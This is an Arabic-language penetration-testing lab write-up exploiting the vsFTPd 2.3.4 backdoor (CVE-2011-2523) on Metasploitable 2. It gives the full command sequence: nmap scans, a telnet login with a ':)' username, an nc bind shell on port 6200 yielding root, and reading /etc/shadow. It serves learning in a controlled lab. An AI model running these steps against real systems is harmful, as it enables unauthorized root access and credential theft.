
المشروع: استغلال الباب الخلفي في vsFTPd 2.3.4 (CVE-2011-2523) على Metasploitable 2.
يُظهر هذا المشروع سير عمل اختبار الاختراق ضد آلة ضعيفة عن قصد، Metasploitable 2. كان الهدف هو تحديد واستغلال وتحليل ثغرة أمنية معروفة في خدمة FTP، مما يؤدي في النهاية إلى الحصول على وصول على مستوى الجذر وتقييم التأثير الأمني.
192.168.56.0/24)تم التحقق من النظام الهدف وتكوين شبكته:
whoami
hostname
ifconfig

تم تأكيد الاتصال الشبكي بين المهاجم والهدف:
ping 192.168.56.101

vsFTPd 2.3.4)تم إجراء اكتشاف المضيف:
nmap -sn 192.168.56.0/24
تم تحديد المضيفين النشطين على الشبكة.

nmap 192.168.56.101
تم اكتشاف عدة منافذ مفتوحة، بما في ذلك:

nmap -sV 192.168.56.101
تم تحديد خدمة FTP قيد التشغيل:
vsFTPd 2.3.4
يتم تضمين فحص كامل للخدمة والبرامج النصية في الملفات الداعمة: مخرجات فحص Nmap.

كانت خدمة FTP تعمل بإصدار ضعيف معروف:
vsFTPd 2.3.4
تم توزيع هذا الإصدار من vsFTPd مع باب خلفي ضار يتم تشغيله عند استخدام اسم مستخدم يحتوي على :) أثناء المصادقة.
عند التنشيط، تفتح الخدمة صدفة ملزمة على المنفذ 6200، مما يسمح بالوصول عن بعد غير المصرح به.
تم تشغيل الباب الخلفي باستخدام Telnet:
telnet 192.168.56.101 21
USER test:)
PASS test

تم الاتصال بالباب الخلفي باستخدام Netcat:
nc 192.168.56.101 6200

whoami
root
تم الحصول على وصول الجذر بنجاح

بعد الحصول على وصول الجذر، تم إجراء تعداد أساسي للنظام:
cat /etc/passwd
cat /etc/shadow
/etc/shadow

يُظهر هذا المختبر كيف يمكن لخدمة ضعيفة واحدة أن تؤدي إلى اختراق كامل للنظام. يسلط الضوء على أهمية التكوين السليم للخدمة، وإدارة التصحيحات، وتقليل أسطح الهجوم المكشوفة.
كانت هذه هي المرة الأولى التي أستغل فيها بابًا خلفيًا حقيقيًا يدويًا. تعلمت كيف يمكن لسلسلة اسم مستخدم خبيثة واحدة (:)) أن تؤدي إلى وصول على مستوى الجذر، مما عزز أهمية تعداد الخدمة واكتشاف الإصدار في مرحلة الاستطلاع. كما أصبحت أكثر راحة مع أوامر لينكس الأساسية بعد الاستغلال، مثل قراءة /etc/shadow وفهم شكل بيانات الاعتماد المشفرة.
كان هذا مختبرًا خاضعًا للرقابة باستخدام Metasploitable 2، وهي آلة ضعيفة عن قصد. الباب الخلفي vsFTPd 2.3.4 هو CVE معروف (CVE-2011-2523) من عام 2011، لذا لا يعكس هذا مشاركة حديثة في العالم الحقيقي. في تقييم حقيقي، ستكون هناك حاجة إلى خطوات إضافية مثل التهرب، وتجاوز التسجيل، أو التنقل. ركز هذا المشروع على فهم آليات الاستغلال الأساسية، وليس اختبار اختراق كامل.